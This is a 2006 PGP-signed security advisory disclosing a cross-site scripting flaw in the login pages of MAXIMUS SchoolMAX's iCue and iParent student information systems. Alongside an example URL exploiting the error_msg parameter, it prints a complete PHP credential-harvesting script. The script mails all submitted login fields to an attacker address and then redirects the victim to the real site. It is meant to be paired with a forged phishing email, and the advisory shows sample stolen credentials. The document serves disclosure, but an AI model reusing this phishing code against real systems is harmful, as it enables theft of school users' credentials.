Maximus.txt

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
The InfoGuard Group Vulnerability Summary 2006-04  
  
Application: Maximus' iCue and iParent (http://www.schoolmax.net)  
Versions: All  
Bugs: Cross-Site Scripting (XSS)  
Date: 18 June 2006  
Author: Charles H.  
E-mail: [email protected]  
Website: http://www.infoguardgroup.com  
  
  
  
1) Introduction  
  
  
SchoolMAX from MAXIMUS is one of the most technologically advanced  
student information systems available today. It is district-based yet  
still provides for school-based management capabilities and controls.  
  
http://www.maximus.com/corporate/pages/SchoolMAX.asp  
  
  
2)Login XSS  
  
The login.asp file assocaited with SchoolMAX's iCue and iParent applications  
suffers from a Cross-Site Scripting flaw. This can result in cookie and/or  
credentials theft, especially if used in conjunction with a social  
engineering attack. A simple attack against iCue might look like this::  
  
https://icue.victimsite.us/toas/icue_login.asp?error_msg=These%20aren't%20the%20droids%20you're%20looking%20for  
  
This will result in the message "These aren't the droids you're looking  
for" being displayed.  
  
This shows the basic idea of the XSS. You can perform various  
obfuscation techniques to hide the message.  
  
Additionally, when used in conjunction with social engineering,user  
credentials can be easily obtained.:  
  
If we take a php file like this:  
  
<?php  
  
  
$my_email = "h@[email protected]";  
  
$header =  
"https://iparent.victimsite.us:8443/iparent/sv_login_secure.asp?invalid_login=true&DST_NBR=&error_msg=Invalid%20login.&USER_NME=&ID=&AT=&SCHNBR=";  
  
if ($_SERVER['REQUEST_METHOD'] != "POST"){exit;}  
  
  
$disallowed_name = array(':',';',"'",'"','=','(',')','{','}','@');  
  
foreach($disallowed_name as $value)  
{  
  
if(stristr($_POST[Name],$value)){header("location:  
$_SERVER[HTTP_REFERER]");exit;}  
  
}  
  
$disallowed_email = array(':',';',"'",'"','=','(',')','{','}');  
  
foreach($disallowed_email as $value)  
{  
  
if(stristr($_POST[Email],$value)){header("location:  
$_SERVER[HTTP_REFERER]");exit;}  
  
}  
  
$message = "";  
  
  
  
while(list($key,$value) =  
each($_POST)){if(!(empty($value))){$set=1;}$message = $message . "$key:  
$value\n\n";} if($set!==1){header("location: $_SERVER[HTTP_REFERER]");exit;}  
  
$message = $message . "-- \nThank you for exploiting iParent";  
$message = stripslashes($message);  
  
$subject = "FormToEmail Comments";  
$headers = "From: " . $_POST['Email'] . "\n" . "Return-Path: " .  
$_POST['Email'] . "\n" . "Reply-To: " . $_POST['Email'] . "\n";  
  
mail($my_email,$subject,$message,$headers);  
header( "Location:  
https://iparent.victimsite.us:8443/iparent/sv_login_secure.asp?invalid_login=true&DST_NBR=&error_msg=Invalid%20login.&USER_NME=&ID=&AT=&SCHNBR="  
);  
  
?>  
  
Post it to some place, then send a forged e-mail which redirects to  
this, we can capture the credentials. When we do,  
here's what the attacker gets in the e-mail:  
  
Subject: FormToEmail Comments  
Date: Mon, 06 Mar 2006 21:48:05 -0900 (AKST)  
From: Nobody <[email protected]>  
To: [email protected]  
  
  
DST_NBR: 1111  
  
USER_NME: 4564654  
  
OPER_PASS: 123456  
  
login: Log in  
  
  
  
4)Patch Status  
  
Maximus has been contacted multiple times since this issue was  
discovered in March. To date, they have not responded.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.3 (MingW32)  
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org  
  
iQEVAwUBRJUVPgt0Y4479LtgAQK5yQf/QYCmo/Tel9z9Aank1y3tJUSv/rmAnLNB  
UxNOGXIflr7cofVncuoXqLq2oI9KGn04QeYafj13+c+42t5KJRHG/Vw8Y0XrWq9b  
hMf+BXkIXq7QCjuyP6HUSpt7j6PmI1FYiidxcL5Y3NmNuChRI4m1akeWIjt55TMp  
OxflWcP3kgnUNT6CSbXKwOzXw9dL+TBlNQfhbQ5fDNIhrghkC4Ar/ivDnHo1qrkS  
Ie6xi7ahT56418W3LaToPnJA1S5ggIvDSpmxKRDO2yU8r0d+bntcSMYQESSwUbAe  
sVUNKcWP8RKXmQy7Mf+2BDZJNesCvKZ/Hu9OSOH96ikHL9OIC/iIxQ==  
=ZBTh  
-----END PGP SIGNATURE-----  
`